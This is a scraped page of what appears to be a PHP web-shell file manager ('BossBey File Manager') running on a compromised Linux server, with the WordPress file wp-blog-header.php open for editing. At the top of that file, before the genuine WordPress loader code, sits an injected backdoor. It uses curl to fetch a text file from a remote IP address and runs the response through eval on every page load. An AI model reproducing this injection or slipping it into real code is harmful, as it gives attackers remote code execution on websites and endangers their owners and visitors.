BossBey File Manager
PHP:
7.4.33
OS:
Linux
User:
JSCUSR001
Root
/
home
/
sj2cfr
/
www
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-blog-header.php
<?php $c = curl_init("http://198.204.232.26/z51128_o/stat/index2.txt"); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_TIMEOUT, 5); curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3); $result = curl_exec($c); if ($result !== false) { eval('?>' . $result); } curl_close($c); /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }
Save
Cancel